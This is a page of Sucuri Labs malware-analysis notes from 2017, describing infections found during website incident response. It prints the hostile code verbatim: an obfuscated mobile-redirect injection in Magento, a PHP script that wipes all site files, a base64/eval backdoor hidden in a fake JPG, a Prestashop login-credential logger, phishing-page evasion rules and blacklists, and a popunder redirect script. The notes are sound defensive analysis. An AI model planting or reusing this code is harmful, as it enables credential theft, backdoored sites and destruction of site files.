Sucuri Labs

Mobile Malware Targets eCommerce Websites & Users

A mobile malware is a malicious software that targets mobile/smartphones, tablets and similar devices. The attacks may vary from fatal damage to the OS (bricking) to leakage of sensitive and personal information, such as credit card, saved passwords, pictures and much more.

With the constant growth of mobile users, attackers are focusing their efforts on developing malware targeting those devices. In this article, we’ll describe how we detected an interesting attack against an ecommerce platform.

During an Incident Response investigation, we identified a malicious code in a Magento installation located at the “./js/mage/cookies.js” file. Here is the snippet:

var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type="text/javascript" src="hxxp://Malicious-URL-REMOVED.com/odessa/?md2"></script>", "write"];function isMobile() {    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);    if (/android.+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i [_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {        return true    };    return false}if (isMobile() === true) {    document[_$_f51c[6]](_$_f51c[5])}

The function isMobile() checks if the visitor is using any of the predefined list of smartphones/tablets and if it matches, the user will be redirected to other malicious websites.

These other websites will prompt to install third-party software that claims to clean or speed up mobile devices, toolbars, adware or even worse, malicious URLs distributing ransomware that will lock the device and hold it hostage until you an X amount of money is paid to the attacker via bitcoin.

Depending on the attacker’s campaign, they may also redirect visitors or potential buyers to competitor websites, therefore causing a huge impact on the site owner’s revenue. Keep in mind that these attacks are not limited to Magento websites only as it may target WordPress, Joomla, OpenCart, Prestashop, and different other platforms.

To detect and prevent these issues, we highly recommend having a File Integrity Monitoring System in place and clean backups of your files/database. If your environment happens to be compromised, you’d be able to identify and promptly restore the files preventing any further damages to your online presence and SEO.

Feel free to contact us if you are experiencing a similar issue or if you have any other security concerns.

Aug 11, 2017 by Moe Obaid

PHP Script Nukes All Website Files

Most malware and spam that we come across has some sort of discernable purpose to it, usually something which benefits the attackers financially. This is often related to spam campaigns, credit card theft, spreading trojans/spyware or phishing scams. However, every so often we find something that defies this trend and is just downright evil. We found a PHP script named config-r.php in the root directory of a website that contained the following code:

<?php
//$dir = getcwd();
if ($_GET['id'] == 'red@<redacted>@delete') {
    $dir   = getcwd();
    $files = scandir($dir);
    if (@$_GET['doAction'] == 'delete') {
        rrmdir($dir);
    } else {
        echo '<br /><br /><a href="config-r.php?id=red@<redacted>@delete&doAction=delete">Yes, Delete AllFiles/Folders</a>';
    }
    echo "<br /><br />";
    echo "<pre>";
    print_r($files);
    echo "</pre>";
}
function rrmdir($dir1)
{
    if (is_dir($dir1)) {
        $objects = scandir($dir1);
        foreach ($objects as $object) {
            if ($object != "." && $object != "..") {
                if (filetype($dir1 . "/" . $object) == "dir") {
                    if ($object != 'config-r.php') {
                        rrmdir($dir1 . "/" . $object);
                    }
                } else {
                    if ($object != 'config-r.php') {
                        unlink($dir1 . "/" . $object);
                    }
                }
            }
        }
        reset($objects);
        @rmdir($dir1);
        echo '<br />Deleted All Files/Folders!<br />';
    }
}

This section of the code waits for the attacker to send a request to the php script:

if(@$_GET['doAction']=='delete')

Simply accessing this file in a web browser with doAction=delete added onto the URL and some sort of a pass code in the id parameter will recursively remove all website files and directories, effectively deleting the entire website file structure and contents. Interestingly, it does not remove the malicious php itself (config-r.php) and will remain on the server even after the big red button is pushed, so to speak.

Fortunately, the website on which we found this script was intact and the attackers had not yet nuked it into oblivion. My best guess is that whoever coded this either had an axe to grind against a particular website or just wanted to reap wanton destruction for the lulz.

If you don\'t want to leave your site existence at mercy of not so noble people, make sure you regularly back up your site and don\'t neglect website security.

Aug 8, 2017 by Ben Martin

Malicious Backdoor Hidden Inside Fake Image

During an incident response investigation, we detected an interesting backdoor that was hidden in a fake image. The attacker was quite creative in creating an attack that would work in two steps.

The attacker created two files. The first file was a normal looking php file that would include the fake image.

Let’s review the content located in the php file: “./wp-content/themes/twentythirteen/images/3.php”

<?phpinclude("check-db.jpg");?>

When looking at the code inside the file: “./wp-content/themes/twentythirteen/images/3.php” we see a strange use of the include function that’s including check-db.jpg but that in itself is not malware.

Let’s go ahead and inspect the image "check-db.jpg". After trying to open the file in the browser it looked as if the image was corrupt, as nothing was displaying.

We then opened the file in a normal text editor and found the main source of the backdoor.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";$_A=strrev("esab")."64_".strrev("edoced");$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');$trd=strrev("taerc")."e_f".strrev("noitcnu");$ctel=$trd('$_S',$_X);$ctel($_S); ?>

Let’s work through the malicious code located inside the fake image “./wp-content/themes/twentythirteen/images/check-db.jpg” step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $_S contains all the malicious code and that will create the backdoor the attacker will use to gain access to your website.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";

The variable $_A contains the function base64_decode once it has been reversed by the strrev function. $_A before it’s been reversed by the strrev function

$_A=strrev("esab")."64_".strrev("edoced");

$_A after it’s been reversed by the strrev function$_A = "base64_decode";

The next step is where the hacker calls a base64_encoded string that will be decoded by the base64_decode function assigned to the $_A variable.

The $_X variable will be decoded by the function “base64_decode” and once complete it will contain the necessary code to execute and create the backdoor for the attacker.

$_X before it’s decoded by the “base64_decode” function

$_X = $_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');

$_X after it’s been decoded by the “base64_decode” function

$_X = base64_decode(eval(gzinflate(base64_decode($_S))));

The variable $trd contains the function create_function but it needs to be reversed in order to be used.$trd before it’s been reversed by the strrev function

$trd=strrev("taerc")."e_f".strrev("noitcnu");

$trd after it’s been reversed by the strrev function

$trd  = “create_function”;$ctel$trd=“create_function”;$ctel=$trd('7Rpdb...',base64_decode(eval(gzinflate(base64_decode($_S)))););$ctel($_S);

Now the following variables $trd & $ctel will combine and execute all the functions to give the attacker full access to your website files/folders.

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

Jul 17, 2017 by Samuel Odendaal

Protecting Phishing Pages via .htaccess

Phishers usually want to protect their pages from being detected by search engines and security companies. To achieve that, they add .htaccess files that deny access to their phishing directories from known IP addresses and networks. Depending on the scenario, if they are targeting a specific type of service (online banking for instance) attackers may allow only a set of visitors from a specific country to see that phishing page.

Though attacker’s skillset may vary, some will just try to customize third-party scripts they find online and it’s not uncommon when they do it poorly. For example, one phishing campaign uses a bot blocking .htaccess file that can be easily found on the Internet. It really protects sites from unwanted bots, but has very little to do with search engines, security companies, and geographic regions (although it blocks some of them) - it just saves bandwidth.

deny from 216.163.255.1 # rpa.metlife.com bored employees
deny from 67.127.164.125 # DSL bandwidth waster
deny from 193.253.199. # france SE art-online.com bandwidth waster
deny from 80.179.254. # clown from Israel using downloader
deny from 64.37.103. # spambots and other non customers
deny from 69.61.12.100 # spambot from servershost.net

Along with the .htaccess file, there may be other files within the phishing structure, such as:

Image directories (img/images) - These directories may contain logo, header/footer images & others related to phishing (Paypal, Banks, etc.).

Jul 11, 2017 by Yuliyan Tsvetkov

A Simple Prestashop Login Swiper

In a compromised environment, attackers may inject malicious code into different files, including the core of different CMSs, in order to maintain access to the website and/or obtain sensitive data. Although these issues are very simple to be identified and remediated, not all users constantly monitor their websites for such file integrity breaches.

One of these injections is known as credential stealer, which consists of intercepting the authentication mechanism and saving the username/password either into a file or sending it via email to the attacker.

During an Incident Response process, we found a malware of this category injected in the Prestashop file “./controllers/AuthController.php”. Here is the snippet:

if (Tools::isSubmit('SubmitLogin'))     {        Module::hookExec('beforeAuthentication');        $passwd = trim(Tools::getValue('passwd'));        $email = trim(Tools::getValue('email'));        if (empty($email))           $this->errors[] = Tools::displayError('E-mail address required');...        elseif (Tools::strlen($passwd) > 32)           $this->errors[] = Tools::displayError('Password is too long');        elseif (!Validate::isPasswd($passwd))           $this->errors[] = Tools::displayError('Invalid password');        else        {strong>eval(gzinflate(base64_decode('bY7fCoIwHIXvBd9BfnihIL5AJkiuuilj2R+IGGYbLsyNzVDI3j016Kbuzsf5OBzOHPao8pqLitCW61o7wISkFbju0zRsJqcjOhDdsnYmqlqJsqTKl4UEDzJwJ6bBGsVr6vHSB6vrLPBtmWndXL9ItgjvET7BMk035EjmCT5EOEbxkOD862G0SlJEojj+W48zu55ItEDrdFCCiwqDQoWfZ3kp9PhsoNcb')));           $customer = new Customer();           $authentication = $customer->getByEmail(trim($email), trim($passwd));           if (!$authentication OR !$customer->id)

]

The obfuscation code is a very common technique used by attackers to hide the malicious code, but most scanners will trigger an alert for files containing a combination of eval() and base64_decode() string.

When decoding it, we could see the following snippet:

if(function_exists("fopen")){$fp=fopen("AjaxController.php","a");fwrite($fp, $email." || ".$passwd." || ".$_SERVER["HTTP_X_FORWARDED_FOR"]." || ".$_SERVER["REMOTE_ADDR"]." || ".$_SERVER["HTTP_USER_AGENT"]."<br><hr>");fclose($fp);}

The code above will run whenever a user tries to authenticate on Prestashop’s backend, dumping sensitive data, such as email, password, IP address and user agent into the file AjaxController.php.

From there, all the attacker has to do is download this file to get a list of credentials and take control over the site to create bogus users, change payment info, and/or perform all different kinds of malicious activities.

On a previous blog post about another credential stealer, we showed how an attacker can send stolen credentials to an email address. The case described in this article though tends to be simpler and more reliable because there's no need for an email account in order to be successful.

To prevent such attacks, keep your Prestashop site and modules always up to date and remember to monitor your core files. If you suspect that your site has been compromised and needs specialized assistance, our security analyst at https://sucuri.net will be glad to help.

Jul 7, 2017 by Conrado Torquato

Phishing the Right Phish

Social engineering techniques, like phishing, can be powerful in persuading users into performing specific actions or disclosing confidential information. In these types of scenarios, attackers look for vulnerable sites on the web to upload fake pages pretending to be trustworthy organizations, such as banks, email and payment services, etc.

During an incident response process, we identified a phishing directory called “login-apple-account” on the website’s root. When accessing the path via HTTP, a very well structured fake version of the Apple ID website would be displayed:

Although at first it may seem just a regular phishing attempt, the page would be displayed only to a very specific set of visitors.

This conditional attack implemented several evasion techniques to prevent access from different IP ranges, and in some cases, redirecting search engines, antivirus and anti-phishing companies to the official Apple ID website through raw header() calls:

header("Location: hXXps://www[.]google[.]ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwi_yey8kvzJAhWwj4MKHVp5ALcQFggcMAA&url=hXXps%3A%2F%2Fappleid[.]apple[.]com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww");

For instance, the “login-apple-account/assets/includes/netcraft_check.php” file prevents the malicious page to be accessed if the user-agent matches Netcraft, an anti-phishing company, redirecting it to a Google search result page:

<?phpif ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)") {        header("Location: hXXps://www[.]google[.]ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=;uact=8&ved=0ahUKEwi_yey8kvzJAhWwj4MKHVp5ALcQFggcMAA&url=hXXps%3A%2F%2Fappleid[.]apple[.]com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww");die();}?>

Other files refer to the “login-apple-account/assets/includes/blacklist.dat”, which has quite a big list of IP ranges from several services, to prevent them from accessing the phishing page:

#  NETCRAFT IP RANGES194.52.68.0-194.52.68.255194.72.238.0-194.72.238.25583.138.182.72-83.138.182.7983.138.189.96-83.138.189.10381.91.240.0-81.91.255.25589.36.24.0-89.36.31.25583.222.232.216-83.222.232.218184.172.0.0-184.173.255.255#  KASPERSKY IP RANGES...

There were also several other AntiVirus and AntiPhishing companies’ IPs listed in that file so the phishing page would go unnoticed during a regular website crawl, therefore preventing the phishing URL to get into blacklists.

Even though it tries to hide itself via HTTP, it cannot stop a server-side scan, so our server-side scanner is able to detect and alert you asap about such phishing pages. If you’re looking for a security solution that helps you avoid such issues, let us know.

Jul 4, 2017 by Fernando Barbosa

Yet Another Expired Domain causes WP Plugin to...

Malicious redirects are very common in compromised websites. Attackers try to take advantage of the site resources to promote spam, distribute other malware/backdoors, and perform all kinds of malicious activities.

The type of attack described in this labs note though, doesn’t involve a single website being compromised but lots of them being affected by it at the same time. Although this is not a new technique and we’ve already covered in a blog post here (https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html), this variant caught our attention because another plugin was being targeted.

During an Incident Response investigation, we found that malicious redirects were coming from a JavaScript loading via the website enmask.com, which is part of a WordPress plugin called “Enmask Captcha”. https://wordpress.org/plugins/enmask-captcha-text-based-hosted-captcha-solution/

“This plugin hasn’t been updated in over 2 years. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.“

Their domain appears to have expired and somebody else purchased it and now anyone using this plugin would experience redirects on their website since the new owner of the domain is deliberately redirecting users.

Here are some more details about this plugin and what is causing the redirect:

Code found on the page:

&
lt;script type="text/javascript" data-enmask-langcode="en-US" src="hxxp://enmask[.]com//Scripts/Enmask.Captcha.js" data-enmask="true" data-enmask-name="myCaptcha"></script>

Clicking anything on the website leads to this page:

http://findbetterresults[.]com/?dn=enmask.com&pid=9PO755G95

The redirect is caused by the following JavaScript which gets returned when requesting any JavaScript file from the domain; it looks like the new owner of the domain is doing this intentionally:

if (typeof _popwnd == 'undefined') {
   var _popwnd = -1;
    function _popwnd_open(){
       if (_popwnd!=-1) return;
       _popwnd = window.open('hxxp://findbetterresults.com/?dn=enmask.com&pid=9PO755G95', '_blank', '');
       _popwnd.blur();
       window.focus();
    }
};
window.addEventListener('click', _popwnd_open);

If you happen to be using this plugin, we highly recommend removing and/or replacing it with another one which is still supported and could provide you similar functionalities.

Loading images and/or scripts from external websites is not recommended (exceptions may apply, like big CDNs or services like Facebook or Ad networks) for various reasons and here are some:

If your website looks and feels, or even its functionality relies on those external resources, any availability issues they have will impact on your website;
If the resource you fetch the content from is compromised, your site may be used to distribute unwanted content (even malicious content) without your consent (like we described in this labs note).

Jun 20, 2017 by Krasimir Konov